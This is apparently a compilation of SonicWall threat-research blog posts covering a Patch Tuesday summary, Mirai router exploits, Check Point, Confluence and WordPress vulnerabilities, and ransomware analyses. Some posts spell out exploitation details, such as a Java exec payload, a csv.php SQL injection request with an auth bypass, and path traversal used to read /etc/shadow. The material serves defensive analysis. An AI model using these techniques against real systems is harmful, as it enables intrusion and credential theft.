Microsoft Security Bulletin Coverage for June 2024

Overview

Microsoft’s June 2024 Patch Tuesday has 49 vulnerabilities, 24 of which are Elevation of Privilege. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June 2024 and has produced coverage for seven of the reported vulnerabilities.

Vulnerabilities with Detections

CVECVE TitleSignature
CVE-2024-30080Microsoft Message Queuing (MSMQ) Remote Code Execution VulnerabilityIPS 4452 Microsoft Message Queuing RCE (CVE-2024-30080)
CVE-2024-30084Windows Kernel-Mode Driver Elevation of Privilege VulnerabilityASPY 6802 Exploit-exe exe.MP_391
CVE-2024-30087Win32k Elevation of Privilege VulnerabilityASPY 6805 Exploit-exe exe.MP_392
CVE-2024-30088Windows Kernel Elevation of Privilege VulnerabilityASPY 6806  Exploit-exe exe.MP_393
CVE-2024-30089Microsoft Streaming Service Elevation of Privilege VulnerabilityASPY 581 Exploit-exe exe.MP_390
CVE-2024-30091Win32k Elevation of Privilege VulnerabilityASPY 580 Exploit-exe exe.MP_389
CVE-2024-35250Windows Kernel-Mode Driver Elevation of Privilege VulnerabilityASPY 579 Exploit-exe exe.MP_388

 

Release Breakdown

The vulnerabilities can be classified into the following categories:

For June there is one Critical, 48 Important and zero Moderate vulnerabilities.

2024 Patch Tuesday Monthly Comparison

Microsoft tracks vulnerabilities that are being actively exploited at the time of discovery and those that have been disclosed publicly before the Patch Tuesday release for each month. The above chart displays these metrics as seen each month.

Release Detailed Breakdown

Denial of Service Vulnerabilities

CVE-2024-30065Windows Themes Denial of Service Vulnerability
CVE-2024-30070DHCP Server Service Denial of Service Vulnerability
CVE-2024-30083Windows Standards-Based Storage Management Service Denial of Service Vulnerability
CVE-2024-35252Azure Storage Movement Client Library Denial of Service Vulnerability

 

Elevation of Privilege Vulnerabilities

CVE-2024-29060Visual Studio Elevation of Privilege Vulnerability
CVE-2024-30064Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-30066Winlogon Elevation of Privilege Vulnerability
CVE-2024-30067WinLogon Elevation of Privilege Vulnerability
CVE-2024-30068Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-30076Windows Container Manager Service Elevation of Privilege Vulnerability
CVE-2024-30082Win32k Elevation of Privilege Vulnerability
CVE-2024-30084Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-30085Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
CVE-2024-30086Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
CVE-2024-30087Win32k Elevation of Privilege Vulnerability
CVE-2024-30088Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-30089Microsoft Streaming Service Elevation of Privilege Vulnerability
CVE-2024-30090Microsoft Streaming Service Elevation of Privilege Vulnerability
CVE-2024-30091Win32k Elevation of Privilege Vulnerability
CVE-2024-30093Windows Storage Elevation of Privilege Vulnerability
CVE-2024-30099Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-35248Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability
CVE-2024-35250Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-35253Microsoft Azure File Sync Elevation of Privilege Vulnerability
CVE-2024-35254Azure Monitor Agent Elevation of Privilege Vulnerability
CVE-2024-35255Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability
CVE-2024-35265Windows Perception Service Elevation of Privilege Vulnerability
CVE-2024-37325Azure Science Virtual Machine (DSVM) Elevation of Privilege Vulnerability

 

Information Disclosure Vulnerabilities

CVE-2024-30069Windows Remote Access Connection Manager Information Disclosure Vulnerability
CVE-2024-30096Windows Cryptographic Services Information Disclosure Vulnerability
CVE-2024-35263Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability

 

Remote Code Execution Vulnerabilities

CVE-2024-30052Visual Studio Remote Code Execution Vulnerability
CVE-2024-30062Windows Standards-Based Storage Management Service Remote Code Execution Vulnerability
CVE-2024-30063Windows Distributed File System (DFS) Remote Code Execution Vulnerability
CVE-2024-30072Microsoft Event Trace Log File Parsing Remote Code Execution Vulnerability
CVE-2024-30074Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability
CVE-2024-30075Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability
CVE-2024-30077Windows OLE Remote Code Execution Vulnerability
CVE-2024-30078Windows Wi-Fi Driver Remote Code Execution Vulnerability
CVE-2024-30080Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
CVE-2024-30094Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30095Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30097Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability
CVE-2024-30100Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-30101Microsoft Office Remote Code Execution Vulnerability
CVE-2024-30102Microsoft Office Remote Code Execution Vulnerability
CVE-2024-30103Microsoft Outlook Remote Code Execution Vulnerability

Decoding Router Vulnerabilities Exploited by Mirai: Insights from SonicWall’s Honeypot Data

As seen in Cybersecurity Insiders, June 2024.

SonicWall has already successfully defended against 5.8 million Mirai-related attacks in 2024, and we’ve seen a spike in honeypot activity related to Mirai, all aimed at exploiting vulnerabilities in aging router systems. These attacks exhibit striking similarities, a theme we will explore further in subsequent sections of this blog. By understanding the common threads among these exploits, we can better fortify our defenses against future incursions and safeguard our network infrastructure from potential compromise.  To facilitate this understanding, SonicWall is committed to continually releasing threat intelligence to ensure the industry has the most complete and updated information related to attacks on small- and medium-sized businesses (SMBs). Our research team has created five signatures across our product portfolio to ensure our customers are protected from this increasing threat.

Mirai is a significant malware threat known for targeting Internet of Things (IoT) devices, such as routers and IP cameras, to form extensive botnets. Emerging in 2016, Mirai exploits weak default credentials and vulnerabilities to compromise devices, granting attackers remote access. These compromised devices are then utilized to orchestrate large-scale Distributed Denial of Service (DDoS) attacks, posing a substantial threat to internet infrastructure worldwide.

Tracing the Path of Mirai’s Evolution

Mirai, created by Paras Jha, Josiah White and Dalton Norman, was crafted to exploit IoT device vulnerabilities for botnet recruitment. Initially, it was detected in August 2016 by MalwareMustDie researchers during a large DDoS attack on Brian Krebs’ cybersecurity site. Mirai’s source code was subsequently released by its creators in September. This release spawned numerous malware iterations, intensifying IoT security concerns. One of the most memorable breaches included the unprecedented 620 Gbps DDoS attack on KrebsOnSecurity and the October 2016 Dyn cyberattack, paralyzing internet services for major platforms like Twitter and Netflix. In 2024, SonicWall has already prevented 13.6 million attacks against IoT devices which is a 29% increase from 2023.

Mirai operates through a systematic sequence of steps: scanning for vulnerable IoT devices, exploiting weaknesses like default credentials to gain entry, infecting them to form a botnet and launching potent DDoS attacks. It spreads by continuously seeking new targets and adapts dynamically to evade detection and mitigation efforts as explained in Figure 1.

Figure 1: Mirai attack chain

Honeypot Insights

Sonicwall’s honeypots found Mirai leveraging exploits targeting old vulnerabilities in routers like Zyxel, Netgear, D-Link and TP-Link to spread Mirai. Let us examine some of the honeypot findings through the similarities in attack patterns.

1. Injection of Commands: Each attack attempts to inject and execute commands on the targeted device. These commands are typically aimed at downloading additional malicious payloads, granting unauthorized access or somehow compromising the device. For example, from a packet captured from our honeypots in Figure 2, wget, chmod and rm commands are injected.

Figure 2: Zyxel USG FLEX 100W Command Injection (CVE-2022-30525)

2. HTTP/HTTPS Requests: All attacks involve HTTP requests to interact with the device’s web interface or execute commands remotely. They manipulate URLs or parameters to exploit vulnerabilities in the target devices. For example, from a packet captured from our honeypots in Figure 3, an HTTP request is made to the device’s GetDeviceSettings endpoint to execute wget and chmod commands.

Figure 3: D-Link Devices HNAP SOAPAction-Header Command Execution CVE-2015-2051

3. Downloading and Executing Scripts: Many attacks found in our honeypots involve downloading additional scripts or binaries onto the device from a remote server and then executing the downloaded package. These scripts often contain malicious payloads aimed at compromising the device’s security or establishing unauthorized access. All of the downloaded scripts we reviewed continue to spread Mirai. For example, from a packet captured from our honeypots in Figure 4, the Mozi.m script is downloaded and executed.

Figure 4: NETGEAR DGN Devices Remote Command Execution

4. Operating System Commands: The commands being executed by Mirai are typically shell commands or scripts intended to manipulate the device’s operating system. They often involve commands like wget, chmod, rm and sh to download, modify permissions and execute scripts from a packet captured from our honeypots as you see in Figure 5.

Figure 5: TP-Link Archer AX21 Command Injection CVE-2023-1389

Who Has the Biggest Risk?

Figure 6: Mirai Hits by Industry

Not all industries are affected the same for every attack vector.  By digging into the data provided by our over 1 million sensors worldwide, we can determine which industries are the most impacted by the Mirai botnet, as you can see in Figure 6.  Real estate and rental businesses appear to be affected the most by Mirai attacks, with the data showing 86.09% of attacks focused on compromising property management systems. The finance and insurance sectors are also taking on a substantial number of attacks with around 9.65% of attacks focused on the financial sector looking to potentially expose sensitive financial data and cause disruptions to online banking services. The wholesale trade (1.88%) and professional, scientific and technical services (1.49%) sectors aren’t immune either, as they can experience supply chain disruptions and compromised networks.

Identification and Mitigation

The recent data seen by both our firewalls and honeypots underscores the urgent need to secure IoT devices to prevent their exploitation for malicious purposes. While each of the mentioned vulnerabilities affects different router products from various manufacturers, some common factors contribute to their susceptibility to exploitation by malware like Mirai. Understanding these factors can assist in preventing and detecting these types of attacks.

  1. Firmware Issues: Many of these vulnerabilities stem from weaknesses in the firmware of the routers. Firmware vulnerabilities can arise due to poor coding practices, insufficient testing or failure to address reported security issues promptly.
  2. Insecure Web Interfaces: Several vulnerabilities involve the routers’ web interfaces, which allow users to configure settings and manage the device. Weaknesses in authentication mechanisms or improper input validation can lead to remote code execution or command injection.
  3. Shell Metacharacters: Exploitation often involves the use of shell metacharacters in user-supplied input fields. These metacharacters allow attackers to manipulate command execution, enabling them to execute arbitrary commands on the router.
  4. Delayed or Lack of Patching: In many cases, vulnerabilities exploited by Mirai and similar malware have been previously disclosed, but routers remain unpatched due to delayed or absent firmware updates. This leaves devices vulnerable to exploitation even after fixes are available.
  5. Default Configurations: Default configurations, including default usernames and passwords, are often targeted by attackers. If users fail to change these default credentials, attackers can easily gain unauthorized access to the router.

To ensure SonicWall customers are prepared for any exploitation that may occur due to these vulnerabilities, the following signatures have been released which can detect and prevent these types of attacks:

  • IPS 18387 D-Link DIR-645 HNAP SOAPAction Header Command Injection
  • IPS 15761 Zyxel USG FLEX 100W Command Injection
  • IPS 13034 NETGEAR DGN Devices Remote Command Execution
  • IPS 15864 TP-Link Archer AX21 Command Injection
  • GAV Mirai

In addition to traditional signatures, Managed Service Providers (MSPs) can significantly enhance protection for small businesses against Mirai botnet attacks. They can deploy the human layer of security to identify attacker behaviors across their networks with full network visibility and proactive threat detection capabilities. By offering a multi-layered defense strategy, MSPs provide small businesses with the expertise and resources needed to defend against evolving cyber threats like the Mirai botnet.

Mirai’s “Mirai” (Future)

The data suggest that Mirai and its variants will continue to evolve, becoming more sophisticated and dangerous. These botnets are likely to incorporate new techniques specifically designed to exploit vulnerabilities in IoT devices, making them even more effective at compromising a wide range of targets. We can also expect these threats to employ advanced evasion tactics to bypass traditional security measures, making detection and mitigation more challenging. Additionally, the target surface for these attacks is expected to broaden significantly, especially as 5G continues to allow more devices with limited reviewed firmware to be network-connected. As technology advances, Mirai is likely to set its sights on emerging technologies, including smart home devices, industrial IoT systems and critical infrastructure.

Protecting against Mirai and similar threats requires a multi-faceted approach. Device manufacturers must prioritize security in their designs, ensuring robust authentication and regular updates. Users need to apply patches promptly to mitigate known vulnerabilities. Implementing network segmentation and strict access controls can limit the impact of Mirai attacks. Behavioral analysis through Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) aids in early detection, while traffic monitoring helps identify Distributed Denial of Service (DDoS) attacks. Managed Service Providers (MSPs) are invaluable in monitoring alerts and identifying these types of attacks. Collaboration through threat intelligence sharing enhances collective defense, and educating users on securing IoT devices is crucial for prevention.

Critical Path Traversal Vulnerability in Check Point Security Gateways (CVE-2024-24919)

Overview

The SonicWall Capture Labs threat research team became aware of an exploited-in-the-wild information disclosure vulnerability affecting the Check Point Security Gateways. Identified as CVE-2024-24919 and given a CVSSv3 score of 8.6, the vulnerability is more severe than it initially appears. While labeled as a sensitive information disclosure vulnerability, it is actually a path traversal attack leading to an arbitrary read, allowing an attacker to read any file on the system. A proof of concept is publicly available on GitHub. To be vulnerable, the gateway needs to have Remote Access VPN or Mobile Access Software Blades enabled. Check Point has made a patch available, and it is advisable to update immediately.

Technical Overview

The flaw is a path traversal bug in the “/clients/MyCRL” endpoint, which can be exploited via manipulated POST requests containing the string “CSHELL/” somewhere in the request. Due to the use of the “strstr” function without proper sanitizing and validation of user input, an attacker can leverage path traversal sequences like “../” within the POST request (Figure 1). This ultimately allows access to sensitive files like /etc/shadow, which contain the password hashes for the system. For our analysis, we used version R80.

 

Figure 1: Vulnerable Code

To trigger and exploit this vulnerability, an attacker must send a POST request containing the string “CSHELL/” and include a path traversal sequence like “../”. This can be done in Python, as shown in the publicly available PoC and Figure 2 below, where “path” is the file the attacker wants access to.

Figure 2: Creating a POST request to obtain sensitive information

Leveraging this code, we can demonstrate dumping the gateway’s “/etc/shadow” file to obtain the system’s hashed credentials, as seen in Figure 3. An attacker can then attempt to crack these hashes to obtain administrative access to the firewall. The attack allows access to any file on the system and is not limited. Note that this is being done against the WAN interface, showing that it is accessible over the Internet.

Figure 3: Dumping Hashed Credentials

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 4440 Check Point Security Gateway Path Traversal

Remediation Recommendations

Check Point’s gateway users are advised to apply the hotfix found in the advisory immediately.  Check Point has labeled this a mandatory patch to express the criticality of the fix.

Relevant Links

 

 

 

 

 

 

INC Ransomware Behind Linux Threat

Overview

This week, the SonicWall Capture Labs Research team analyzed a sample of Linux ransomware. The group behind this ransomware, called INC Ransomware, has been active since it was first reported a year ago.

Infection Cycle

The malware is a Linux executable in ELF file format. A quick inspection of its strings revealed command-line arguments that can be passed to this ELF file.

Figure 1: List of Command Line Arguments

Upon execution with the identified parameters, the malware appends “INC” to the names of encrypted files.

Figure 2: Debug Output Using the –debug Option

Figure 3: Encrypted files with “INC” appended file extension

The malware also creates a file named “kill,” a shell script using the esxcli utility available in VMWare ESXi to list and kill all virtual machine processes if running in an ESXi environment. Since our analysis was not conducted in such an environment, this command resulted in an error as the utility was not found.

Figure 4: Content of the “kill” and delete scripts

Another file created is “delete,” which is a shell script using the ESXi command-line utility vim-cmd to delete all available virtual machines.
Copies of ransom notes were dropped in directories where files were encrypted, consistent with other ransomware behavior.

Figure 5: Contents of “Inc_readme.html” Ransom note

The parameter ‘–motd’ also changed the message of the day (MOTD) on the infected machine to display the ransom note message upon successful login.

Figure 6: Message of the Day shows ransom note message

Visiting the URL in the ransom note led to a blog site listing all supposed victims.

Figure 7: INC Ransom blog site

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: LinuxINC.RSM(Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

For further details, visit the official man page for MOTD.

 

SonicWall Elevate 2024: Ready for the Next Level

It’s Time to Elevate

SonicWall’s current business momentum has been fueled by growth in its partner community. As part of our continued commitment to our partners, we’ve recently added Cloud Secure Edge and Managed Security Services to our lineup. And at RSA Conference this year, we unveiled SonicPlatform, which unifies all SonicWall products under a singular, integrated interface to streamline management tasks and foster deeper integration for our MSPs and MSSPs.  

At Elevate 2024, we’re excited to share an ultimate in-depth look at our recent evolution as well as show exclusive previews of SonicWall’s elevated corporate roadmap. You won’t want to miss out on Elevate 2024 and the unique opportunity to network, learn and strategize.   

What’s in Store for Elevate ’24?

SonicWall is committed to providing meaningful initiatives to its partners and it’s starting to pay dividends. Great success starts with good support — and SonicWall’s Elevate 2024 partner event is all about what we can do to support you! Join us for:  

  • Personalized meetings with SonicWall executives, thought leaders and product experts 
  • Exclusive demonstrations of our latest technological advancements, including Cloud Secure Edge 
  • A sneak peek at how our recent acquisitions can help grow and diversify your business 
  • A preview of upcoming network security solutions  
  • An interactive learning experience about minimizing alert fatigue and leveraging opportunities with SonicWall MDR’s 24×7 SOC protection 
  • Breakout sessions, workshops, and Q&A to boost your knowledge and skills 

And that’s not all. Networking events and receptions will offer a chance to network, share stories and exchange success tips with other business leaders! 

Connect With the SonicWall Team

Don’t miss the chance to interact with our executive leaders. These industry veterans are eager to engage with you and share valuable insights. Our team includes: 

  • Bob VanKirk, President, and CEO 
  • Jason Carter, Chief Revenue Officer   
  • Michael Crean, EVP of Managed Services   
  • Michelle Ragusa-McBain, VP of Global Channel   
  • Chandro Prasad, EVP Product Management and Product Marketing   
  • Christine Bartlett, Chief Marketing Officer   
  • Tarun Desikan, VP of Cloud Security   
  • Osca St. Marthe, EVP Solution Engineers, Sales & Partner Enablement   
  • Ryan Matlock, Chief Customer Success Officer   

Get Ready for an Elevated Experience!

Join us in Dallas, USA, from June 12-14, 2024, Lisbon, Portugal, from June 26-28, 2024, or Bali, Indonesia from July 10-12, 2024, by registering on our Elevate 2024 portal. You can find registration links and the agendas for each event in the table below. We look forward to seeing you there! For more information about Elevate 2024, contact us or visit the Elevate homepage.

Elevate 2024 Agendas and Registration
RegistrationAgenda
Dallas, USAJune 12-14, 2024
Lisbon, PortugalJune 26-28, 2024
Bali, IndonesiaJuly 10-12, 2024

Confluence Data Center and Server Remote Code Execution Vulnerability

Overview

The SonicWall Capture Labs threat research team became aware of a remote code execution vulnerability in the Atlassian Confluence Data Center and Server, assessed its impact and developed mitigation measures. Confluence Server is a software to manage documentation and knowledge bases with an ubiquitous presence across the globe. Identified as CVE-2024-21683, Confluence Data Center and Server before version 8.9.1(data center only), 8.5.9 LTS and 7.19.22 LTS allows an authenticated threat actor with the privilege of adding new macro languages to execute arbitrary code, earning a high CVSS score of 8.3. Confluence users are encouraged to upgrade their instances to the latest fixed version, as mentioned by the vendor in the advisory.

Technical Overview

This vulnerability arises due to a flaw in the input validation mechanism in the ‘Add a new language’ function of the ‘Configure Code Macro’ section. This function allows users to upload a new code block macro language definition to customize the formatting and syntax highlighting. It expects the Javascript file to be formatted according to the custom brush syntax. Insufficient validation allows the authenticated attacker to inject malicious Java code embedded in a file, such as java.lang.Runtime.getRuntime().exec(”touch /tmp/poc”) , which will be executed on the server.

Triggering the Vulnerability

Leveraging the vulnerability mentioned above requires the attacker to meet the below prerequisites.

  1. The attacker must have network access to the target vulnerable system.
  2. The attacker must have the privilege to add new macro languages.
  3. The forged JavaScript language file containing malicious Java code needs to be uploaded to the Configure Code Macro > Add a new language

The following steps will walk through the process of exploitation and the measures taken to address the vulnerability in the updated version. We used Confluence versions 8.5.0 and 8.5.9 in our tests.

To begin with, the attacker uploads the language file containing malicious Java code (similar to the one mentioned above) on the page seen in Figure 1.

Figure 1: Add a new language page

The payload will be sent for evaluation to the ‘parseLanguage’ method of the ‘RhinoLanguageParser’ class, which can be found at the below location:

WEB-INF/atlassian-bundled-plugins/com.atlassian.confluence.ext.newcode-macro-plugin-5.0.1.jar!/com/atlassian/confluence/ext/code/languages/impl/RhinoLanguageParser.class

The ‘script’ variable will be formed and the ‘evaluateString’ method will process the payload, as illustrated in Figure 2.

Figure 2: Payload evaluation by RhinoLanguageParser

If we step-into the function, the ‘evaluateString’ method will further pass the control to the ‘doTopCall’ method of the ‘ScriptRuntime’ class as seen in Figure 3. So far, the behavior of both the vulnerable and fixed versions is identical.

Figure 3: Execution of the payload by ScriptRuntime class

The result of executing the ‘doTopCall’ method (shown in Figure 3) behaves differently in the vulnerable and fixed versions. The fixed version (8.5.9) throws a ‘RhinoException’ while executing ‘doTopCall’ jumps directly to line#92 and abruptly terminates the execution of the ‘evaluateString’ method of the ‘RhinoLanguageParser’ class, as seen in Figure 4. Thanks to enhanced checks, it prevents using Java references in the uploaded file and displays ‘java is not defined’ in an exception message.

Figure 4: Abruptly terminated execution in fixed version

On the other hand, the vulnerable version (8.5.0) allows the execution of the ‘doTopCall’ and hence enables the execution of the ‘evaluateString’ method of the ‘RhinoLanguageParser’ class. It also throws the ‘InvalidLanguageException’ later on, but only after executing the injected malicious Java code as seen in Figure 5.

Figure 5: Malicious code execution in a vulnerable version

Although both the vulnerable and fixed versions of the Confluence server display similar errors on the GUI, as seen in Figure 6, the damage has already been done in the vulnerable version.

Figure 6: Common error on GUI

Exploitation

The exploitation of this vulnerability yields the remote threat actor the ability to execute arbitrary code on the server. It has a high impact on the confidentiality, integrity and availability of the system and does not require user interaction.

To achieve the remote code execution, the forged JavaScript language file with crafted payload needs to be uploaded, which will form a request as seen in the top portion of Figure 7. This request will generate a file ‘/tmp/poc’ as mentioned in the payload, as seen in the bottom portion of Figure 7.

Figure 7: Malformed request(above) and RCE in vulnerable instance(below)

Additionally, the payload can be modified to yield a reverse shell as seen in Figure 8.

Figure 8: Achieving reverse shell

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 4437 Atlassian Confluence Data Center and Server RCE
  • IPS: 4438 Atlassian Confluence Data Center and Server RCE 2

Remediation Recommendations

Considering Confluence Server’s pivotal role in maintaining an organization’s knowledge base, users are strongly encouraged to upgrade their instances to the latest versions, as mentioned in the vendor advisory.

Relevant Links

Better Together: Integrating Microsoft Sentinel with SonicWall Firewalls

Getting Started

As cyber threats continue to evolve, organizations need robust security solutions to detect, respond to and prevent incidents. Microsoft Sentinel, a cloud-native Security Information and Event Management (SIEM) solution, provides intelligent security analytics and threat intelligence across the enterprise. SonicWall Next-Generation Firewalls (NGFWs), on the other hand, are a trusted network security solution that protects your network from external threats. Integrating these two products can significantly enhance your security operations.

Understanding Microsoft Sentinel and SonicWall Firewalls:

Microsoft Sentinel
Microsoft Sentinel is a scalable, cloud-native SIEM and Security Orchestration Automated Response (SOAR) solution. Uncover sophisticated threats and respond decisively with an intelligent, comprehensive security information and event management (SIEM) solution for proactive threat detection and hunting, threat investigation, and response. Microsoft Sentinel provides a consolidated way to acquire content like data connectors, workbooks, analytics and automations.

SonicWall Firewalls
SonicWall NGFWs provide the security, control and visibility to maintain an effective cybersecurity posture. SonicWall firewalls are designed to meet your specific security and usability needs, all at a cost that will protect your budget while securing your network infrastructure.

Features like stateful high availability and power supply redundancy deliver ‘always-on’ continuity, while superior UX and simpler, single-pane-of-glass management ease complexity. And with SD-WAN and DPI-SSL included, they offer an industry-leading TCO.

Features and Functionality

The integration of SonicWall NGFWs with Microsoft Sentinel can help organizations achieve a higher level of holistic visibility, security, real-time threat detection and response automation for their security infrastructure. These integration capabilities will enable our partners and customers to forward the firewall logs to the Microsoft Sentinel cloud platform, parse the logs, create custom workflows and automate the responses.

Configuration Steps

Integration can be configured in these simple steps:

1. Deploying a Microsoft Sentinel Workspace

  • Create a new resource using a custom template that builds the resources needed for Microsoft Sentinel.

2. Installing the SonicWall Solution for Microsoft Sentinel

  • Install the pre-defined “SonicWall Network Security” solution from the Microsoft Sentinel Content hub.
  • Configure the Common Event Format (CEF) via AMA data connector’s data collection rule to set the event filter types (Syslog facilities) to collect.
  • Configure the collection rules:
    • LOG_LOCAL* (0-7) to LOG_DEBUG
    • LOG_SYSLOG to LOG_DEBUG
    • LOG_USER to LOG_DEBUG

3. Installing the Operations Management Suite (OMS) or Log Analytics Agent

  • The OMS/Log Analytics Agent provides a Syslog relay. This agent should be installed on a host within the network and configure SonicOS to send ArcSight-formatted Syslog data to the agent. The Agent establishes a secure connection with Azure, so the log data is not sent to the cloud in plaintext.

4. Configuring a Syslog Server on a SonicWall Firewall

  • Configure a syslog server on your SonicWall NGFW and select Syslog Format as ArcSight (CEF) from the dropdown.
  • Specify the IP address/name of your Linux VM as the Syslog server, and Syslog Facility should be Local use 4.
    Note: Refer to this Knowledge Base Article for more information.
  • Validate that the OMS/Log Analytics Agent is receiving CEF messages and can connect to Azure.

5. Microsoft Sentinel Workbooks for SonicWall Firewalls

  • The “SonicWall Network Security” data connector includes workbooks containing a variety of queries for our various security services, as well as other traffic and security insights. You can configure the analytics rule, hunting query and workbooks as per your requirements.

Benefits of Integration

The integration of Microsoft Sentinel and SonicWall NGFWs offers several benefits for enhancing your organization’s security posture.

  • Holistic View: Microsoft Sentinel provides a bird’s-eye view across your infrastructure, reducing the stress of handling sophisticated attacks and numerous alerts.
  • Real-time Threat Detection: By ingesting SonicWall logs, you enhance your threat detection capabilities and gain visibility into network traffic, user behavior, and potential security incidents.
  • Threat Visibility and Proactive Hunting: Azure Sentinel provides intelligent security analytics, threat intelligence, and proactive hunting capabilities. It allows you to detect threats across your environment and respond promptly.
  • Automated Response: Combine Microsoft Sentinel’s SOAR capabilities with SonicWall’s real-time data to automate incident response. You can create/use playbooks to execute predefined actions based on specific events. This combination provides robust protection against evolving threats.

Availability

The SonicWall Firewalls and Microsoft Sentinel cloud platform integration is now available to all of our partners/customers.

For more detailed instructions, please refer to the SonicWall Firewall-Sentinel Integration Guide. Here is the data connector instructions article.

Better Together

Integrating the Microsoft Sentinel cloud platform with SonicWall Firewalls is a strategic move for organizations seeking comprehensive security. By leveraging the power of both platforms, you can proactively defend against threats, streamline incident responses, and stay ahead in the ever-evolving cybersecurity landscape.

Remember, security is a continuous journey, and this integration is a significant step toward a safer digital environment. Happy securing! 🔒🌐

We appreciate your continuous support, and please don’t hesitate to contact us if you have any queries or require more information. 😊

WordPress Unauthenticated Arbitrary SQL Execution Vulnerability

Overview

The SonicWall Capture Labs threat research team became aware of a noteworthy vulnerability –an SQL injection in the WordPress plugin Automatic by ValvePress – assessed its impact and developed mitigation measures for it. Around ~38k active users have installed this premium plugin. The issue allows trivial SQL injection attacks against the plugin user’s authentication process, which could allow WordPress website takeovers. The SQL vulnerability is identified as CVE-2024-27956 and was assigned a critical CVSSv3 score of 9.9.  Considering the sizeable user base, low attack complexity, and publicly available exploit code, including a simple SQL query, WordPress users are strongly encouraged to upgrade their instances to the latest or automatic plugin version above 3.92.1 with utmost priority.

Technical Overview

This vulnerability allows threat actors to circumvent the authentication mechanism by sending a crafted SQL query to the web server.

The WordPress Automatic plugin, developed by Valvepress, is popularly known for automatically posting content from any website. It can import content from popular sites like YouTube, Flickr, Vimeo, Twitter and other social media platforms utilizing the APIs from almost any website. It can also generate content using OpenAI’s ChatGPT.

CVE-2024-27956 arose due to improper neutralization of special elements used in an SQL Command. This allows unauthenticated actors to bypass the normal authentication process and inject SQL code that grants them elevated system privileges. This further allows nefarious activists to create admin‑level user accounts, upload malicious files and take full control of affected sites. Out of the 5.5 million attacks observed, as reported by HackerNews in the last week of March 2024, it was observed that attackers changed the name of the vulnerable file “inc/csv.php” and renamed sensitive files to prevent the site owner or fellow hackers from controlling the hijacked site. Once a WordPress site is under their control, attackers ensure the longevity of their access by creating backdoors and modifying the code.

Triggering the Vulnerability

The flaw exists in “inc/csv.php”, which generally resides under the plugin installation directory. A typical path to the vulnerable file is “/wp‑content/plugins/wp‑automatic/inc/csv.php”. It is also shown in our PoC demonstration in Figure 2.

WP users can supply any random SQL query to the $q variable, as shown in Figure 1. This variable will be further executed on line 32 of  Figure 1, with $wpdb->get_results( $q).

Figure 1: inc/csv.php

Prior to execution, there are basic authentication and integrity checks.

  • The first check involves the $current_user->user_pass This value would be an empty string if an unauthenticated user accessed the file.
  • The second check needs only the MD5 value of the supplied SQL query to the $integ since $current_user->user_pass is an empty string.
  • Additionally, before the two checks, there is a check of if(wp_automatic_trim($auth == ”)), which means one can’t just input an empty string to the $auth.
  • To bypass this, an attacker can supply a single whitespace (” “) to the $auth as &auth=%00 and achieve an arbitrary SQL query execution.

An example POST request to trigger the vulnerability would look like:

http[:]//target-ip:port/wp-content/plugins/wp-automatic/inc/csv.php

q={{query}}&auth=%00&integ={{md5query}}

With the authentication parameter containing whitespace, as shown in Figure 2.

Exploiting the Vulnerability

To exploit the issue, a WordPress setup with ValvePress’ vulnerable WordPress automatic plugin (< 3.92.1 version) is needed. An attacker only needs to be able to access the instance remotely which could be over the internet or a local network.  A working PoC with a crafted SQL query aids in exploiting this vulnerability.

A demonstration of exploitation based on the publicly available PoC can be seen in Figure 2 (below).

Figure 2: CVE-2024-27956 Exploitation

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

IPS: 19918 – WordPress Automatic Plugin SQL Injection

Remediation Recommendations

Considering the severe consequences of this vulnerability and the trending of nefarious activists trying to  leverage the exploit in the wild, users are strongly encouraged to update their instances to WP automatic plugin version 3.92.1 or later to remove the vulnerability.

Relevant Links

Politically Charged Ransomware Weaponized as a File Destroyer

The SonicWall Capture Labs threat research team has been observing a growth of malware built using the Chaos ransomware builder. The sample we have analyzed here is built using this kit, however, it is not intended to work as traditional ransomware, but rather, as a file destroyer. The intent appears to be the destruction of files in response to Italy’s stance on the Israel-Palestine conflict. It purports to be created on behalf of the Italian Socialist Party and is likely aimed at infecting machines within the Italian government’s infrastructure.

Infection Cycle

The malware uses the following icon:

Upon infection, files on the system are encrypted. Each file is given a file extension consisting of four random alphanumeric characters. As this malware is intended to destroy files, the decryption key is probably not stored by the attackers for file retrieval later on in exchange for money. A file named “Leggimi.txt” (“Read me” in Italian) is dropped into directories containing encrypted files. It contains the following message in Italian:

A rough translation of that message is as follows:

—————————- -Ransomware route

Italy must be punished for its alliance with the fascist state
By Israel, this malware was scheduled by Marxisti-Leninisti-Maoisti
To spread the anti -medical thought. Of the Palestinians are dying for Your actions, I will kill your files. There is no way to recover them.

Palestine Libera
Italy Red Unit and Socialists

The message makes no mention of file decryption for payment and no contact information is presented. Any encrypted files are therefore irretrievable.

Reverse engineering the malware reveals a list of targeted file extensions:

We can also see a list of directories that are targeted:

An image file is embedded in the malware executable file. It is base64 encoded:

After decoding the image, it is displayed as the desktop wallpaper:

SonicWall Capture Labs provides protection against this threat via the following signature:

